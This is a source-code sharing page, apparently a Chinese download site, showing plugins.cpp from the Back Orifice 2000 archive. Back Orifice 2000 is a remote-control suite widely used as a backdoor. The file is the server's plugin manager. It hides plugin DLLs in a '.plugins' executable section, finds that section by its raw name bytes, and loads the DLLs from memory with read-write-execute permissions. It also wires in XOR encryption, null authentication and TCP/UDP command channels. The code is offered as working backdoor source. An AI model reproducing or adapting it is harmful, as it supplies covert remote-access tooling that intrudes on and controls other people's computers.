开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 远程控制编程 > 查看源码
plugins.cpp
资源名称:bo2ksrc.zip [点击查看]
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:9k
源码类别:

远程控制编程

开发平台:

WINDOWS

plugins.cpp:源码内容
  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  4.     This program is free software; you can redistribute it and/or modify
  5.     it under the terms of the GNU General Public License as published by
  6.     the Free Software Foundation; either version 2 of the License, or
  7.     (at your option) any later version.
  9.     This program is distributed in the hope that it will be useful,
  10.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  11.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12.     GNU General Public License for more details.
  14.     You should have received a copy of the GNU General Public License
  15.     along with this program; if not, write to the Free Software
  16.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  18. The author of this program may be contacted at dildog@l0pht.com. */
  20. #include<windows.h>
  21. #include<winnt.h>
  22. #include<bocomreg.h>
  23. #include<iohandler.h>
  24. #include<encryption.h>
  25. #include<dll_load.h>
  26. #include<commandloop.h>
  27. #include<comm_native.h>
  28. #include<plugins.h>
  29. #include<cmdcmd_tcpip.h>
  30. #include<cmdcmd_plugin.h>
  31. #include<cmdcmd_file.h>
  32. #include<config.h>
  33. #include<xorencrypt.h>
  34. #include<deshash.h>
  35. #include<io_simpleudp.h>
  36. #include<io_simpletcp.h>
  37. #include<nullauth.h>
  38. #include<main.h>
  40. // -------------------- Plugins placeholder segment ------------------
  42. #pragma data_seg(".plugins")
  44. BYTE buttocks[1024]="<<<.OOM>>>";
  46. #pragma data_seg()
  48. #pragma comment(linker,"/section:.plugins,r")
  51. // --------------------- Plugin manager options ----------------------
  52. char g_svBuiltInOptions[]="<**CFG**>Built-In"
  53.                           "B:Load XOR Encryption=1"
  54. //   "B:Load DES Encryption=1"
  55.   "B:Load NULLAUTH Authentication=1"
  56.   "B:Load UDP IO Module=1"
  57.   "B:Load TCP IO Module=1";
  60. // --------------------- Function implementations ---------------------
  62. HMODULE *g_phmodPlugins=NULL;
  63. int g_nPluginCount=0;
  65. void InitializeCommands(void)
  66. {
  67. // Register Native BO Commands
  68. RegisterNativeCommands();
  70. // Initialize Native BO Commands
  71. Cmd_Tcpip_Init();
  72. Cmd_Buttplugs_Init();
  73. Cmd_FileXfer_Init();
  75. // Initialize DLLLoad
  76. InitializeDLLLoad();
  78. // Create Global IO, Encryption, and Authentication Handlers
  79. g_pIOHandler=new CIOHandler();
  80. if(g_pIOHandler==NULL) return;
  81. g_pEncryptionHandler=new CEncryptionHandler();
  82. if(g_pEncryptionHandler==NULL) return;
  83. g_pAuthHandler=new CAuthHandler();
  84. if(g_pAuthHandler==NULL) return; 
  86. // Add built-in options
  87. if(GetCfgBool(g_svBuiltInOptions,"Load XOR Encryption"))
  88. g_pEncryptionHandler->Insert(GetXOREncryptionEngine());
  89. // if(GetCfgBool(g_svBuiltInOptions,"Load DES Hashing"))
  90. g_pEncryptionHandler->Insert(GetDESHashEngine());
  92. if(GetCfgBool(g_svBuiltInOptions,"Load UDP IO Module"))
  93. g_pIOHandler->Insert(GetSimpleUdpIOHandler());
  94. if(GetCfgBool(g_svBuiltInOptions,"Load TCP IO Module"))
  95. g_pIOHandler->Insert(GetSimpleTcpIOHandler());
  96. if(GetCfgBool(g_svBuiltInOptions,"Load NULLAUTH Authentication"))
  97. g_pAuthHandler->Insert(GetNullAuthHandler());
  99. // Load plugins
  100. LoadPlugins();
  101. }
  103. void TerminateCommands(void)
  104. {
  105. // Unload plugins
  106. UnloadPlugins();
  108. // Get rid of authentication handler
  109. int i;
  110. for(i=0;i<MAX_AUTH_HANDLERS;i++) {
  111. g_pAuthHandler->Remove(i);
  112. }
  113. delete g_pAuthHandler;
  115. // Uninstall encryption
  116. for(i=0;i<MAX_ENCRYPTION_ENGINES;i++) {
  117. g_pEncryptionHandler->Remove(i);
  118. }
  119. delete g_pEncryptionHandler;
  121. // Terminate IO System
  122. for(i=0;i<MAX_IO_HANDLERS;i++) {
  123. g_pIOHandler->Remove(i);
  124. }
  125. delete g_pIOHandler;
  127. // Remove DLLLoad
  128. KillDLLLoad();
  130. // Terminate native commands
  131. Cmd_FileXfer_Kill();
  132. Cmd_Buttplugs_Kill();
  133. Cmd_Tcpip_Kill();
  134. }
  137. void LoadPlugins(void)
  138. {
  139. BYTE *pImage=(BYTE *)g_module;
  141. // Get PE Header
  142. PIMAGE_FILE_HEADER pfh;
  143. pfh=(PIMAGE_FILE_HEADER) PEFHDROFFSET(pImage);
  145. // Get Section Count
  146. int nSectionCount;
  147. nSectionCount=pfh->NumberOfSections;
  149. // Get Section Header
  150. PIMAGE_SECTION_HEADER psh;
  151.     psh = (PIMAGE_SECTION_HEADER)SECHDROFFSET (pImage);
  153. // Find the ".plugins" segment
  154. int i;
  155. for(i=0;i<nSectionCount;i++) {
  156. if( (*((DWORD *)(psh->Name))==0x756C702E) &&
  157. (*(((DWORD *)(psh->Name))+1)==0x736E6967) ) {
  158. break;
  159. }
  160. psh++;
  161. }
  162. if(i==nSectionCount) return;
  164. // Get plugin header
  165. PATTACHMENT_HEADER pah;
  166. pah = (PATTACHMENT_HEADER)RVATOVA(pImage,psh->VirtualAddress);
  168. // Install each plugin
  169. BYTE *pPlugin;
  170. DWORD dwSize;
  171. int count;
  173. count=pah->nNumPlugins;
  174. g_nPluginCount=0;
  175. pPlugin=(((BYTE *)pah)+sizeof(ATTACHMENT_HEADER));
  176. for(i=0;i<count;i++) {
  177. // Get Plugin Size
  178. dwSize=*((DWORD *)pPlugin);
  179. pPlugin+=sizeof(DWORD);
  181. // Add plugin
  182. AddPlugin(pPlugin,dwSize);
  184. // Go to next plugin
  185. pPlugin+=dwSize;
  186. }
  187. }
  190. void UnloadPlugins(void)
  191. {
  192. int i;
  194. if(g_phmodPlugins!=NULL) {
  195. for(i=0;i<g_nPluginCount;i++) {
  196. HMODULE hDLL;
  197. hDLL=*(g_phmodPlugins+i);
  198. TYPEOF_TerminatePlugin *TerminatePlugin=(TYPEOF_TerminatePlugin *)GetDLLProcAddress(hDLL,"TerminatePlugin");
  200. TerminatePlugin();
  201. FreeDLL(hDLL);
  202. }
  203. free(g_phmodPlugins);
  204. g_phmodPlugins=NULL;
  205. g_nPluginCount=0;
  206. }
  207. }
  209. int AddPlugin(void *pPlugin, int nSize)
  210. {
  211. // Fill in plugin linkage to pass to installation function
  212. PLUGIN_LINKAGE pl;
  213. pl.pEncryptionHandler=g_pEncryptionHandler;
  214. pl.pIOHandler=g_pIOHandler;
  215. pl.pAuthHandler=g_pAuthHandler;
  216. pl.pIssueAuthCommandRequest=IssueAuthCommandRequest;
  217. pl.pIssueAuthCommandReply=IssueAuthCommandReply;
  218. pl.pListenAuthSocket=ListenAuthSocket;
  219. pl.pConnectAuthSocket=ConnectAuthSocket;
  220. pl.pDispatchCommand=DispatchCommand;
  221. pl.pRegisterCommand=RegisterCommand;
  222. pl.pUnregisterCommand=UnregisterCommand;
  223. pl.pRegisterClientMenu=NULL;
  224. pl.pUnregisterClientMenu=NULL;
  225. pl.pInteractiveConnect=NULL;
  226. pl.pInteractiveListen=NULL;
  228. // Load Plugin DLL
  229. HMODULE hDLL;
  230. hDLL=LoadDLLFromImage(pPlugin,NULL,RWX_PERMISSIONS);
  231. if(hDLL!=NULL) {
  232. // Call plugin installation function
  233. TYPEOF_InstallPlugin *InstallPlugin=(TYPEOF_InstallPlugin *)GetDLLProcAddress(hDLL,"InstallPlugin");
  235. if(InstallPlugin(pl)) {
  237. // Increase size of plugin array
  238. void *pMem,*pDum;
  239. pMem=malloc(sizeof(HMODULE)*(g_nPluginCount+1));
  240. if(pMem!=NULL) {
  241. memcpy(pMem,g_phmodPlugins,sizeof(HMODULE)*g_nPluginCount);
  242. pDum=g_phmodPlugins;
  243. g_phmodPlugins=(HMODULE *)pMem;
  244. if(pDum!=NULL) free(pDum);
  246. // Add plugin to plugin array
  247. g_phmodPlugins[g_nPluginCount]=hDLL;
  248. g_nPluginCount++;
  249. return 0;
  250. }
  252. FreeDLL(hDLL);
  253. }
  254. return -1;
  255. }
  257. int DebugPlugin(char *svPluginFile)
  258. {
  259. // Fill in plugin linkage to pass to installation function
  260. PLUGIN_LINKAGE pl;
  261. pl.pEncryptionHandler=g_pEncryptionHandler;
  262. pl.pIOHandler=g_pIOHandler;
  263. pl.pAuthHandler=g_pAuthHandler;
  264. pl.pIssueAuthCommandRequest=IssueAuthCommandRequest;
  265. pl.pIssueAuthCommandReply=IssueAuthCommandReply;
  266. pl.pListenAuthSocket=ListenAuthSocket;
  267. pl.pConnectAuthSocket=ConnectAuthSocket;
  268. pl.pDispatchCommand=DispatchCommand;
  269. pl.pRegisterCommand=RegisterCommand;
  270. pl.pUnregisterCommand=UnregisterCommand;
  271. pl.pRegisterClientMenu=NULL;
  272. pl.pUnregisterClientMenu=NULL;
  273. pl.pInteractiveConnect=NULL;
  274. pl.pInteractiveListen=NULL;
  276. // Load Plugin DLL
  277. HMODULE hDLL;
  278. hDLL=LoadLibrary(svPluginFile);
  279. if(hDLL!=NULL) {
  280. // Call plugin installation function
  281. TYPEOF_InstallPlugin *InstallPlugin=(TYPEOF_InstallPlugin *)GetDLLProcAddress(hDLL,"InstallPlugin");
  283. if(InstallPlugin(pl)) {
  285. // Increase size of plugin array
  286. void *pMem,*pDum;
  287. pMem=malloc(sizeof(HMODULE)*(g_nPluginCount+1));
  288. if(pMem!=NULL) {
  289. memcpy(pMem,g_phmodPlugins,sizeof(HMODULE)*g_nPluginCount);
  290. pDum=g_phmodPlugins;
  291. g_phmodPlugins=(HMODULE *)pMem;
  292. if(pDum!=NULL) free(pDum);
  294. // Add plugin to plugin array
  295. g_phmodPlugins[g_nPluginCount]=hDLL;
  296. g_nPluginCount++;
  297. return 0;
  298. }
  300. FreeDLL(hDLL);
  301. }
  302. return -1;
  303. }
  306. int RemovePlugin(int nNum)
  307. {
  308. if(nNum<0 || nNum>=g_nPluginCount) return -1;
  310. // Unload specified plugin
  312. HMODULE hDLL;
  313. hDLL=g_phmodPlugins[nNum];
  314. TYPEOF_TerminatePlugin *TerminatePlugin=(TYPEOF_TerminatePlugin *)GetDLLProcAddress(hDLL,"TerminatePlugin");
  316. TerminatePlugin();
  317. FreeDLL(hDLL);
  318. FreeLibrary(hDLL); // For debugging plugins only
  320. // Remove from array
  322. void *pMem,*pDum;
  323. pMem=malloc(sizeof(HMODULE)*(g_nPluginCount-1));
  324. if(pMem==NULL) return -1;
  326. memcpy(pMem,g_phmodPlugins,sizeof(HMODULE)*nNum);
  327. memcpy((HMODULE *)pMem+nNum,g_phmodPlugins+(nNum+1),sizeof(HMODULE)*(g_nPluginCount-(nNum+1)));
  329. pDum=g_phmodPlugins;
  330. g_phmodPlugins=(HMODULE *)pMem;
  331. free(pDum);
  333. g_nPluginCount--;
  335. return 0;
  336. }
  338. HMODULE GetPlugin(int nNum)
  339. {
  340. if(nNum<0 || nNum>=g_nPluginCount) return NULL;
  342. return g_phmodPlugins[nNum];
  343. }